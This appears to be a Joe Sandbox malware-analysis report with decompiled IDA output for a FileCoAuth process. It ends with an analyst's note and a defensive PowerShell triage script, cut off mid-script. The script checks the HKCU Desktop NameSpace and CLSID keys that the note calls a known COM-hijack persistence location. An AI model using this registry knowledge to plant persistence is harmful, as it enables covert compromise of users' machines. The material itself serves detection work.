    • GetModuleFileNameW.KERNEL32(00E90000,?,00000104,Dv), ref: 00E92424
      • Part of subcall function 00E91EF0: GetLastError.KERNEL32(00E92433), ref: 00E91EF0
    Strings
    Memory Dump Source
    • Source File: 00000009.00000002.2316793338.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000002.2316778948.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000002.2316825591.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000002.2316842454.0000000000EB0000.00000004.sdmp
    • Associated: 00000009.00000002.2316855023.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: ErrorFileLastModuleName
    • String ID: .tlb$Dv
    • API String ID: 2776309574-2600295937
    • Opcode ID: 0e9f6afd914587efa5d1c7529691133f569dbdd0c36480ade7f71631d412b70c
    • Instruction ID: caf44031450a1ff0070a0bd31cd4938929f4453321e102bc6851c8342cd3b567
    • Opcode Fuzzy Hash: 0e9f6afd914587efa5d1c7529691133f569dbdd0c36480ade7f71631d412b70c
    • Instruction Fuzzy Hash: 1F411471D01229ABCF21DBB4CC94BAE73E8AF49310F0151A9EE05FB240E734ED448B90
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 79%
    			E00E98664(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				signed int _t36;
    				void* _t67;
    				void* _t71;
    				void* _t75;
    				void* _t79;
    				signed int _t83;
    				void* _t86;
    				void* _t91;
    
    				_t87 = __edi;
    				_t86 = __edx;
    				_push(0x24);
    				E00EA3161(E00EA3B7D, __ebx, __edi, __esi);
    				 *(_t91 - 0x18) = 0xeb2350;
    				EnterCriticalSection(0xeb2350);
    				 *((char*)(_t91 - 0x14)) = 1;
    				 *(_t91 - 4) =  *(_t91 - 4) & 0x00000000;
    				_t36 =  *0xeb2398;
    				if((1 & _t36) == 0) {
    					 *0xeb2398 = _t36 | 1;
    					_t83 = 8;
    					 *(_t91 - 4) = 1;
    					memset(0xeb23a0, 0, _t83 << 2);
    					_t87 = 0xeb23a0 + _t83;
    					E00E9882E(1, 0xeb23a0 + _t83, 0xeb2350, 0);
    					E00EA2BBA(0, 0xea5828);
    					 *(_t91 - 4) = 0;
    				}
    				if( *0xeb23a4 == 0) {
    					_t10 = _t91 - 0x10;
    					 *_t10 =  *(_t91 - 0x10) & 0x00000000;
    					_t98 =  *_t10;
    					_t67 = _t91 - 0x30;
    					_push(E00E94E9D(_t67, L"Monikers::FileSyncClient"));
    					_push(_t67);
    					 *(_t91 - 4) = 2;
    					E00E990AD(E00E98890(1, _t86, _t87, 0xeb2350,  *_t10), _t91 - 0x10);
    					 *(_t91 - 4) = 0;
    					E00E94307(_t91 - 0x30, 1, 0);
    					_t71 = _t91 - 0x30;
    					 *(_t91 - 0x10) = 1;
    					_push(E00E94E9D(_t71, L"Monikers::SyncEngineCOMServer"));
    					_push(_t71);
    					 *(_t91 - 4) = 3;
    					E00E990AD(E00E98890(1, _t86, _t87, 0xeb2350,  *_t10), _t91 - 0x10);
    					 *(_t91 - 4) = 0;
    					E00E94307(_t91 - 0x30, 1, 0);
    					_t75 = _t91 - 0x30;
    					 *(_t91 - 0x10) = 2;
    					_push(E00E94E9D(_t75, L"Monikers::SyncEngineStorageProviderHandlerProxy"));
    					_push(_t75);
    					 *(_t91 - 4) = 4;
    					E00E990AD(E00E98890(1, _t86, _t87, 0xeb2350, _t98), _t91 - 0x10);
    					 *(_t91 - 4) = 0;
    					E00E94307(_t91 - 0x30, 1, 0);
    					_t79 = _t91 - 0x30;
    					 *(_t91 - 0x10) = 3;
    					_push(E00E94E9D(_t79, L"Monikers::ToastActivation"));
    					_push(_t79);
    					 *(_t91 - 4) = 5;
    					E00E990AD(E00E98890(1, _t86, _t87, 0xeb2350, _t98), _t91 - 0x10);
    					E00E94307(_t91 - 0x30, 1, 0);
    				}
    				LeaveCriticalSection(0xeb2350);
    				return E00EA313E(0xeb23a0);
    			}

    APIs
    • __EH_prolog3.LIBCMT ref: 00E9866B
    • EnterCriticalSection.KERNEL32(00EB2350,00000024,00E987D0,0000000C,00E9563E,?,RunningObjectTableHelper::CreateMoniker,00000054,00E95540,?,00000000,?,?,?,?,RunningObjectTableHelper::GetObjectW), ref: 00E98679
    • LeaveCriticalSection.KERNEL32(00EB2350,?,RunningObjectTableHelper::CreateMoniker,00000054,00E95540,?,00000000,?,?,?,?,RunningObjectTableHelper::GetObjectW), ref: 00E987A7
      • Part of subcall function 00E9882E: __EH_prolog3.LIBCMT ref: 00E98835
      • Part of subcall function 00EA2BBA: __onexit.MSVCRT ref: 00EA2BC0
    Strings
    • Monikers::SyncEngineCOMServer, xrefs: 00E98700
    • Monikers::FileSyncClient, xrefs: 00E986D0
    • P#, xrefs: 00E98670
    • Monikers::ToastActivation, xrefs: 00E98770
    • Monikers::SyncEngineStorageProviderHandlerProxy, xrefs: 00E98736
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: CriticalH_prolog3Section$EnterLeave__onexit
    • String ID: Monikers::FileSyncClient$Monikers::SyncEngineCOMServer$Monikers::SyncEngineStorageProviderHandlerProxy$Monikers::ToastActivation$P#
    • API String ID: 3635153894-838542986
    • Opcode ID: 09bfc293b7846343b6e82b68c8568abeb19c852e06ed8d1a1106fc1dfa5abcb8
    • Instruction ID: 5c8dbc28c17de11ee7e008034e744858dc6850245e4074d22b709746fcc5cb66
    • Opcode Fuzzy Hash: 09bfc293b7846343b6e82b68c8568abeb19c852e06ed8d1a1106fc1dfa5abcb8
    • Instruction Fuzzy Hash: 25319EB1911358AADF15EBB4DD46FAE7BE86F1A300F50145DF105B72C2DA7456088631
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 29%
    			E00E923DD(struct HINSTANCE__* __ecx, signed int __edx, void* __edi, signed int* _a4, signed int* _a8) {
    				signed int _v8;
    				char _v20;
    				short _v560;
    				signed int* _v564;
    				intOrPtr _v568;
    				void* __ebx;
    				void* __esi;
    				signed int _t20;
    				signed int* _t22;
    				long _t26;
    				WCHAR* _t27;
    				WCHAR* _t28;
    				signed int _t29;
    				WCHAR* _t38;
    				signed int* _t40;
    				signed short _t44;
    				signed int* _t46;
    				intOrPtr _t47;
    				signed int _t49;
    				signed int _t50;
    				void* _t54;
    				void* _t56;
    				WCHAR* _t58;
    				signed int _t62;
    
    				_t54 = __edi;
    				_t51 = __edx;
    				_t20 =  *0xeb0090; // 0xbb40e64e
    				_v8 = _t20 ^ _t62;
    				_t22 = _a4;
    				_v564 = _t22;
    				_t40 = _a8;
    				if(_t22 == 0 || _t40 == 0) {
    					goto L21;
    				} else {
    					 *_t22 =  *_t22 & 0x00000000;
    					 *_t40 =  *_t40 & 0x00000000;
    					_push(_t56);
    					_t26 = GetModuleFileNameW(__ecx,  &_v560, 0x104);
    					if(_t26 != 0) {
    						if(_t26 != 0x104) {
    							_t44 = _v560;
    							_t27 =  &_v560;
    							_t58 = 0;
    							if(_t44 == 0) {
    								L13:
    								_t59 =  ==  ? _t27 : _t58;
    								_t28 =  &_v560;
    								_v568 =  ==  ? _t27 : _t58;
    								__imp__#161(_t28, _t40);
    								if(_t28 >= 0) {
    									L17:
    									_t29 =  &_v560;
    									__imp__#2(_t29);
    									 *_v564 = _t29;
    									if(_t29 == 0) {
    										_t46 =  *_t40;
    										_t51 =  *_t46;
    										 *((intOrPtr*)( *_t46 + 8))(_t46);
    										 *_t40 =  *_t40 & 0x00000000;
    									}
    									goto L19;
    								}
    								_t47 = _v568;
    								_t51 = _t47 -  &_v560 >> 1;
    								asm("movsd");
    								asm("movsd");
    								asm("movsw");
    								_t54 = _t54;
    								if((_t47 -  &_v560 >> 1) + 5 <= 0x104) {
    									__imp__wcscpy_s(_t47, 0x10e,  &_v20);
    									L00E91E60(0x10e - _t51);
    									_t38 =  &_v560;
    									__imp__#161(_t38, _t40);
    									if(_t38 < 0) {
    										goto L19;
    									}
    									goto L17;
    								}
    								goto L19;
    							}
    							_t49 = _t44 & 0x0000ffff;
    							do {
    								_t50 = _t49 & 0x0000ffff;
    								if(_t50 == 0x2e) {
    									_t58 = _t27;
    								} else {
    									if(_t50 == 0x5c) {
    										_t58 = 0;
    									}
    								}
    								_t27 = CharNextW(_t27);
    								_t49 =  *_t27 & 0x0000ffff;
    							} while (_t49 != 0);
    							goto L13;
    						}
    						goto L19;
    					} else {
    						E00E91EF0();
    						L19:
    						_pop(_t56);
    						L21:
    						return E00EA29F2(_t40, _v8 ^ _t62, _t51, _t54, _t56);
    					}
    				}
    			}

    APIs
    • GetModuleFileNameW.KERNEL32(?,?,00000104,?), ref: 00E92424
      • Part of subcall function 00E91EF0: GetLastError.KERNEL32(00E92433), ref: 00E91EF0
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: ErrorFileLastModuleName
    • String ID: .tlb
    • API String ID: 2776309574-1487266626
    • Opcode ID: 0e9f6afd914587efa5d1c7529691133f569dbdd0c36480ade7f71631d412b70c
    • Instruction ID: caf44031450a1ff0070a0bd31cd4938929f4453321e102bc6851c8342cd3b567
    • Opcode Fuzzy Hash: 0e9f6afd914587efa5d1c7529691133f569dbdd0c36480ade7f71631d412b70c
    • Instruction Fuzzy Hash: 1F411471D01229ABCF21DBB4CC94BAE73E8AF49310F0151A9EE05FB240E734ED448B90
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 91%
    			E00EA188D(void* __ebx, void* __edi, void* __esi, void* __eflags) {
    				int _t99;
    				long _t105;
    				void* _t128;
    				void* _t130;
    				void* _t132;
    				int _t136;
    				intOrPtr _t163;
    				long _t170;
    				void* _t171;
    				void* _t182;
    
    				_push(0xac);
    				E00EA3194(E00EA54F3, __ebx, __edi, __esi);
    				_t136 = 0;
    				_t163 =  *((intOrPtr*)(_t171 + 8));
    				 *(_t171 - 0x90) =  *(_t171 + 0xc);
    				_t167 =  <=  ? RegOpenKeyExW(0x80000001,  *0xeb0070, 0, 0x20119, _t171 - 0x94) : _t90 & 0x0000ffff | 0x80070000;
    				if(( <=  ? RegOpenKeyExW(0x80000001,  *0xeb0070, 0, 0x20119, _t171 - 0x94) : _t90 & 0x0000ffff | 0x80070000) < 0) {
    					L18:
    					return E00EA3152(_t136, _t163, _t167);
    				}
    				 *(_t171 - 0x9c) = 0;
    				 *(_t171 - 0x8c) = 0;
    				_t167 =  <=  ? RegQueryInfoKeyW( *(_t171 - 0x94), 0, 0, 0, _t171 - 0x9c, _t171 - 0x8c, 0, 0, 0, 0, 0, 0) : _t95 & 0x0000ffff | 0x80070000;
    				 *((intOrPtr*)(_t171 - 0xac)) = _t167;
    				if(_t167 < 0) {
    					L17:
    					RegCloseKey( *(_t171 - 0x94));
    					goto L18;
    				}
    				E00E9A1D7(_t171 - 0x40, _t163);
    				 *(_t171 - 4) = 0;
    				if( *((intOrPtr*)(_t171 + 0x10)) != 0) {
    					_t138 = "(";
    					_t130 = E00E995C9(_t163, _t138, 0xffffffff, E00E94E74("("));
    					_t136 = 0;
    					if(_t130 != 0xffffffff) {
    						_t132 = E00E99428(_t163, _t171 - 0x58, 0, _t130);
    						 *(_t171 - 4) = 1;
    						E00E990AD(_t171 - 0x40, _t132);
    						 *(_t171 - 4) = 0;
    						E00E94307(_t171 - 0x58, 1, 0);
    					}
    				}
    				_t170 =  *(_t171 - 0x90);
    				_t99 =  *(_t171 - 0x8c) + 1;
    				 *(_t171 - 0x8c) = _t99;
    				 *(_t171 - 0x98) = _t136;
    				while(1) {
    					_t180 = _t136 -  *(_t171 - 0x9c);
    					if(_t136 >=  *(_t171 - 0x9c)) {
    						break;
    					}
    					 *(_t171 - 0x90) = 0;
    					 *(_t171 - 0xa8) = 0;
    					 *((intOrPtr*)(_t171 - 0xa4)) = 0;
    					 *((intOrPtr*)(_t171 - 0xa0)) = 0;
    					_push(_t171 - 0x90);
    					_push(_t99);
    					E00E9E365(_t136, _t171 - 0xa8, _t163, _t170, _t180);
    					 *(_t171 - 4) = 2;
    					 *(_t171 - 0xb0) =  *(_t171 - 0x8c);
    					_t105 = RegEnumKeyExW( *(_t171 - 0x94), _t136,  *(_t171 - 0xa8), _t171 - 0xb0, 0, 0, 0, 0);
    					 *(_t171 - 0x90) = _t105;
    					_t181 = _t105;
    					if(_t105 < 0) {
    						L14:
    						 *(_t171 - 4) = 0;
    						E00E98AA7(_t171 - 0xa8);
    						_t136 = _t136 + 1;
    						 *(_t171 - 0x98) = _t136;
    						if( *(_t171 - 0x90) < 0) {
    							break;
    						}
    						_t99 =  *(_t171 - 0x8c);
    						continue;
    					}
    					E00E94E9D(_t171 - 0x70, L"Software\\Classes\\CLSID\\");
    					 *(_t171 - 4) = 3;
    					E00E98198(_t171 - 0x70, _t181,  *(_t171 - 0xa8), E00E94E74( *(_t171 - 0xa8)));
    					 *((intOrPtr*)(_t171 - 0x18)) = 0;
    					 *((intOrPtr*)(_t171 - 0x14)) = 0;
    					 *((intOrPtr*)(_t171 - 0x14)) = 7;
    					 *((intOrPtr*)(_t171 - 0x18)) = 0;
    					 *((short*)(_t171 - 0x28)) = 0;
    					 *(_t171 - 4) = 4;
    					E00E94E9D(_t171 - 0x88, 0xea7340);
    					 *(_t171 - 4) = 5;
    					_t182 = E00E9F290(0x80000001, _t171 - 0x70, _t171 - 0x88, 1, _t171 - 0x28);
    					_t137 = _t136 & 0xffffff00 | _t182 > 0x00000000;
    					 *(_t171 - 4) = 4;
    					E00E94307(_t171 - 0x88, 1, 0);
    					if((_t136 & 0xffffff00 | _t182 > 0x00000000) == 0) {
    						L13:
    						 *(_t171 - 4) = 3;
    						E00E94307(_t171 - 0x28, 1, 0);
    						 *(_t171 - 4) = 2;
    						E00E94307(_t171 - 0x70, 1, 0);
    						_t136 =  *(_t171 - 0x98);
    						goto L14;
    					}
    					if(E00E9944F(_t171 - 0x28, _t163) == 0) {
    						L12:
    						E00E94E9D(_t171 - 0x58,  *(_t171 - 0xa8));
    						 *(_t171 - 4) = 6;
    						_push( *0xeb13e0 & 0x000000ff);
    						_push(_t171 - 0x58);
    						_push(0);
    						_push(_t171 - 0xb8);
    						E00EA15BB(_t137, _t170, _t163, _t170, _t187);
    						 *(_t171 - 4) = 4;
    						E00E94307(_t171 - 0x58, 1, 0);
    						goto L13;
    					}
    					if( *((char*)(_t171 + 0x10)) == 0) {
    						goto L13;
    					}
    					_t127 =  >=  ?  *((void*)(_t171 - 0x40)) : _t171 - 0x40;
    					_t128 = E00E9952D(_t171 - 0x28,  >=  ?  *((void*)(_t171 - 0x40)) : _t171 - 0x40, 0,  *((intOrPtr*)(_t171 - 0x30)));
    					_t187 = _t128;
    					if(_t128 != 0) {
    						goto L13;
    					}
    					goto L12;
    				}
    				_t81 = _t171 - 4;
    				 *_t81 =  *(_t171 - 4) | 0xffffffff;
    				__eflags =  *_t81;
    				E00E94307(_t171 - 0x40, 1, 0);
    				_t167 =  *((intOrPtr*)(_t171 - 0xac));
    				goto L17;
    			}

    Instruction addresses (the IDA plugin's per-line address column, spilled out of the listing's layout): the function body spans 0x00ea188d to 0x00ea1b88; entries of 0x00000000 marked source lines with no address of their own.

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00EA1897
    • RegOpenKeyExW.ADVAPI32(80000001,00000000,00020119,?,000000AC), ref: 00EA18C2
    • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EA1907
    • RegEnumKeyExW.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00EA19FC
      • Part of subcall function 00E94307: ??3@YAXPAX@Z.MSVCR120 ref: 00E94332
    • RegCloseKey.ADVAPI32(?), ref: 00EA1B7B
    Strings
    • Software\Classes\CLSID\, xrefs: 00EA1A10
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: ??3@CloseEnumH_prolog3_InfoOpenQuery
    • String ID: Software\Classes\CLSID\
    • API String ID: 3668791304-2087380861
    • Opcode ID: c99de056791d3be96f5b50e8258bb6cf82e77b55e052cb088f505ea5184c5109
    • Instruction ID: 5140b600df36ced74365b4064ade69e3c512af02155b4dd5a9dcad9841cb4f0f
    • Opcode Fuzzy Hash: c99de056791d3be96f5b50e8258bb6cf82e77b55e052cb088f505ea5184c5109
    • Instruction Fuzzy Hash: CF815071900258EEEF11DBA4CC41FEEBBB8AF09304F145199E549BB192DB706E85CF61
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 65%
    			E00EA0694(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
    				char* _t85;
    				char* _t98;
    				char* _t103;
    				void* _t106;
    				void* _t108;
    				void* _t110;
    				char* _t111;
    				void* _t112;
    				void* _t115;
    				void* _t118;
    				char* _t119;
    				intOrPtr _t123;
    				intOrPtr* _t140;
    				char* _t151;
    				void* _t152;
    
    				_t148 = __edi;
    				_t146 = __edx;
    				_push(0x70);
    				E00EA3194(E00EA5141, __ebx, __edi, __esi);
    				 *((intOrPtr*)(_t152 - 0x60)) = __ecx;
    				_t123 =  *((intOrPtr*)(_t152 + 8));
    				 *((intOrPtr*)(_t152 - 0x5c)) =  *((intOrPtr*)(_t152 + 0x10));
    				E00E94E9D(_t152 - 0x58, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace");
    				 *(_t152 - 4) = 0;
    				 *(_t152 - 0x6c) = 0;
    				 *((intOrPtr*)(_t152 - 0x68)) = 0;
    				 *((intOrPtr*)(_t152 - 0x64)) = 0;
    				 *(_t152 - 4) = 1;
    				_t81 =  >=  ?  *((void*)(_t152 - 0x58)) : _t152 - 0x58;
    				E00E94E9D(_t152 - 0x40,  >=  ?  *((void*)(_t152 - 0x58)) : _t152 - 0x58);
    				 *(_t152 - 4) = 2;
    				_push(_t152 - 0x6c);
    				_push( *((intOrPtr*)(_t152 + 0xc)));
    				_push(_t152 - 0x40);
    				_push(0x80000001);
    				_t85 = E00E9EF91(_t123, __edi, __esi,  *((intOrPtr*)(_t152 - 0x44)) - 8);
    				_t150 = _t85;
    				 *(_t152 - 4) = 1;
    				E00E94307(_t152 - 0x40, 1, 0);
    				if(_t85 >= 0) {
    					_t151 =  *(_t152 - 0x6c);
    					_t148 =  *((intOrPtr*)(_t152 - 0x68));
    					while(_t151 != _t148) {
    						E00E9A1D7(_t152 - 0x40, _t151);
    						 *(_t152 - 4) = 3;
    						_push(_t152 - 0x40);
    						_push(_t123);
    						__eflags = E00EA110C(_t123,  *((intOrPtr*)(_t152 - 0x60)), _t146, _t148, _t151, __eflags);
    						if(__eflags != 0) {
    							_push(_t152 - 0x40);
    							_t118 = E00EA009C( *((intOrPtr*)(_t152 - 0x5c)), _t151, __eflags);
    							_push(_t118);
    							_t119 = _t118 + 0x10;
    							__eflags = _t119;
    							_push(_t119);
    							_push(0);
    							_push(_t152 - 0x74);
    							E00EA0244(_t123,  *((intOrPtr*)(_t152 - 0x5c)), _t148, _t151, _t119);
    						}
    						 *(_t152 - 4) = 1;
    						E00E94307(_t152 - 0x40, 1, 0);
    						_t151 =  &(_t151[0x18]);
    						__eflags = _t151;
    					}
    					_t150 = L"Personal";
    					if(E00E99650(_t123, 0,  *((intOrPtr*)(_t123 + 0x10)), L"Personal", E00E94E74(L"Personal")) == 0) {
    						_t150 =  *(_t152 - 0x6c);
    						_t148 =  *((intOrPtr*)(_t152 - 0x68));
    						while(_t150 != _t148) {
    							E00E9A1D7(_t152 - 0x40, _t150);
    							 *(_t152 - 4) = 4;
    							_push(_t152 - 0x40);
    							_push(_t123);
    							_t98 = E00EA110C(_t123,  *((intOrPtr*)(_t152 - 0x60)), _t146, _t148, _t150, __eflags);
    							__eflags = _t98;
    							if(_t98 == 0) {
    								 *((intOrPtr*)(_t152 - 0x18)) = 0;
    								 *((intOrPtr*)(_t152 - 0x14)) = 0;
    								 *((intOrPtr*)(_t152 - 0x14)) = 7;
    								 *((intOrPtr*)(_t152 - 0x18)) = 0;
    								 *((short*)(_t152 - 0x28)) = 0;
    								 *(_t152 - 4) = 5;
    								_t146 = _t152 - 0x40;
    								_t103 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t152 - 0x60)))))) + 0x1c))(_t152 - 0x40,  *((intOrPtr*)(_t152 + 0xc)), _t152 - 0x28);
    								__eflags = _t103;
    								if(_t103 >= 0) {
    									__eflags =  *((intOrPtr*)(_t152 - 0x14)) - 8;
    									_t106 =  >=  ?  *((void*)(_t152 - 0x28)) : _t152 - 0x28;
    									__imp__CompareStringOrdinal(_t106, 0xffffffff, L"{a52bba46-e9e1-435f-b3d9-28daa648c0f6}", 0xffffffff, 1);
    									__eflags = _t106 - 2;
    									if(__eflags != 0) {
    										_t140 = _t123 + 0x30;
    										__eflags =  *((intOrPtr*)(_t140 + 0x14)) - 8;
    										if( *((intOrPtr*)(_t140 + 0x14)) >= 8) {
    											_t140 =  *_t140;
    										}
    										__eflags =  *((intOrPtr*)(_t152 - 0x14)) - 8;
    										_t108 =  >=  ?  *((void*)(_t152 - 0x28)) : _t152 - 0x28;
    										__imp__CompareStringOrdinal(_t108, 0xffffffff, _t140, 0xffffffff, 1);
    										__eflags = _t108 - 2;
    										if(__eflags == 0) {
    											_push(_t152 - 0x40);
    											_t110 = E00EA009C( *((intOrPtr*)(_t152 - 0x5c)), _t150, __eflags);
    											_push(_t110);
    											_t111 = _t110 + 0x10;
    											__eflags = _t111;
    											_push(_t111);
    											_t112 = _t152 - 0x7c;
    											goto L16;
    										}
    									} else {
    										_push(_t152 - 0x40);
    										_t115 = E00EA009C( *((intOrPtr*)(_t152 - 0x5c)), _t150, __eflags);
    										_push(_t115);
    										_push(_t115 + 0x10);
    										_t112 = _t152 - 0x74;
    										L16:
    										_push(0);
    										_push(_t112);
    										E00EA0244(_t123,  *((intOrPtr*)(_t152 - 0x5c)), _t148, _t150, __eflags);
    									}
    								}
    								 *(_t152 - 4) = 4;
    								E00E94307(_t152 - 0x28, 1, 0);
    							}
    							 *(_t152 - 4) = 1;
    							E00E94307(_t152 - 0x40, 1, 0);
    							_t150 =  &(_t150[0x18]);
    							__eflags = _t150;
    						}
    					}
    				}
    				 *(_t152 - 4) = 0;
    				E00E94EF3(_t152 - 0x6c);
    				 *(_t152 - 4) =  *(_t152 - 4) | 0xffffffff;
    				E00E94307(_t152 - 0x58, 1, 0);
    				return E00EA3152(_t123, _t148, _t150);
    			}

    Instruction addresses (the IDA plugin's per-line address column, spilled out of the listing's layout): the function body spans 0x00ea0694 to 0x00ea08c0; entries of 0x00000000 marked source lines with no address of their own.

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00EA069B
      • Part of subcall function 00E9EF91: __EH_prolog3_GS.LIBCMT ref: 00E9EF9B
      • Part of subcall function 00E9EF91: RegOpenKeyExW.ADVAPI32(?,?,00000000,00000000,00000000), ref: 00E9EFED
      • Part of subcall function 00E9EF91: RegEnumKeyExW.ADVAPI32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00E9F032
      • Part of subcall function 00E9EF91: RegCloseKey.ADVAPI32(00000000), ref: 00E9F09C
      • Part of subcall function 00E94307: ??3@YAXPAX@Z.MSVCR120 ref: 00E94332
      • Part of subcall function 00EA110C: __EH_prolog3_GS.LIBCMT ref: 00EA1116
    • CompareStringOrdinal.KERNEL32(?,000000FF,{a52bba46-e9e1-435f-b3d9-28daa648c0f6},000000FF,00000001), ref: 00EA080B
    • CompareStringOrdinal.KERNEL32(?,000000FF,00000000,000000FF,00000001), ref: 00EA084A
      • Part of subcall function 00EA009C: __EH_prolog3_catch.LIBCMT ref: 00EA00A3
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: H_prolog3_$CompareOrdinalString$??3@CloseEnumH_prolog3_catchOpen
    • String ID: Personal$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace${a52bba46-e9e1-435f-b3d9-28daa648c0f6}
    • API String ID: 636749635-3553581249
    • Opcode ID: eebc616157de6eec1a0b6eb9b6d147edd6b08b37c58d0dda8552d7af344b2a78
    • Instruction ID: 48ab70449f7e510fbd2c588ca4ea49351e8e029ef5e882b6aad1996fcf60dc08
    • Opcode Fuzzy Hash: eebc616157de6eec1a0b6eb9b6d147edd6b08b37c58d0dda8552d7af344b2a78
    • Instruction Fuzzy Hash: E4713571D00208EEDF04EBE4CC85FEDBBB8AF1A314F245158E515BB282D774AA45CBA1
    Uniqueness

    Uniqueness Score: -1,00%
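    The two functions above, E00EA188D and E00EA0694, walk HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace and resolve each subkey name against HKCU\Software\Classes\CLSID\<guid>, comparing the result case-insensitively (CompareStringOrdinal with bIgnoreCase = 1) against one fixed GUID literal and against a string the caller supplies. Those keys are user-writable and are a well-known shell namespace extension persistence and COM-hijack location, so the listing alone does not say whether the sample is cleaning up its own entries or tampering with someone else's; the analyst settles that by looking at what the keys actually hold on the analysis VM or a suspect host. The PowerShell below is an added example written for this report, not code from the sample, from OneDrive or from Joe Sandbox: it enumerates the same keys, resolves each GUID to its CLSID registration in the same per-user-first order, and reports the entries worth a second look. The allow-list content, the reason labels and the signature check are assumptions for illustration.

```powershell
# Added example (not code from the sample, from OneDrive, or from Joe Sandbox):
# enumerate the same HKCU keys the decompiled functions E00EA0694 and E00EA188D
# walk, resolve each namespace GUID to its CLSID registration, and report the
# entries a triage analyst should look at. Names and labels are assumptions.

$NameSpaceKey = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace'

# The only GUID literal visible in E00EA0694. The sample compares it with
# CompareStringOrdinal(..., bIgnoreCase = 1); the comparison below is
# case-insensitive too. Add GUIDs you have vetted yourself (assumption).
$KnownGuids = @('{a52bba46-e9e1-435f-b3d9-28daa648c0f6}')

function Resolve-NamespaceClsid {
    param([Parameter(Mandatory)][string]$Guid)

    # Same lookup order as the sample: per-user CLSID first
    # (HKCU\Software\Classes\CLSID\<guid>), then the machine-wide key.
    # A per-user key shadowing a machine key is the COM-hijack shape.
    $candidates = [ordered]@{
        HKCU = "HKCU:\Software\Classes\CLSID\$Guid"
        HKLM = "HKLM:\SOFTWARE\Classes\CLSID\$Guid"
    }
    $source = $null; $clsidKey = $null
    foreach ($hive in $candidates.Keys) {
        if (Test-Path -LiteralPath $candidates[$hive]) {
            $source = $hive; $clsidKey = $candidates[$hive]; break
        }
    }

    $display = $null; $serverPath = $null; $exists = $null; $sigStatus = $null
    if ($clsidKey) {
        $display = (Get-ItemProperty -LiteralPath $clsidKey -ErrorAction SilentlyContinue).'(default)'
        $server  = (Get-ItemProperty -LiteralPath "$clsidKey\InProcServer32" -ErrorAction SilentlyContinue).'(default)'
        if ($server) {
            $serverPath = [Environment]::ExpandEnvironmentVariables($server.Trim('"'))
            $exists     = Test-Path -LiteralPath $serverPath
            if ($exists) { $sigStatus = (Get-AuthenticodeSignature -FilePath $serverPath).Status }
        }
    }

    # Reasons an entry deserves a second look; an empty list means "nothing odd".
    [string[]]$reasons = @()
    if ($KnownGuids -notcontains $Guid.ToLowerInvariant()) { $reasons += 'guid-not-in-allowlist' }
    if ($null -eq $source)                                 { $reasons += 'no-clsid-registration' }
    if ($source -eq 'HKCU')                                { $reasons += 'per-user-clsid' }
    if ($exists -eq $false)                                { $reasons += 'inprocserver-missing' }
    if ($sigStatus -and $sigStatus -ne 'Valid')            { $reasons += "signature-$sigStatus" }

    [pscustomobject]@{
        Guid         = $Guid
        ClsidSource  = $source
        DisplayName  = $display
        InProcServer = $serverPath
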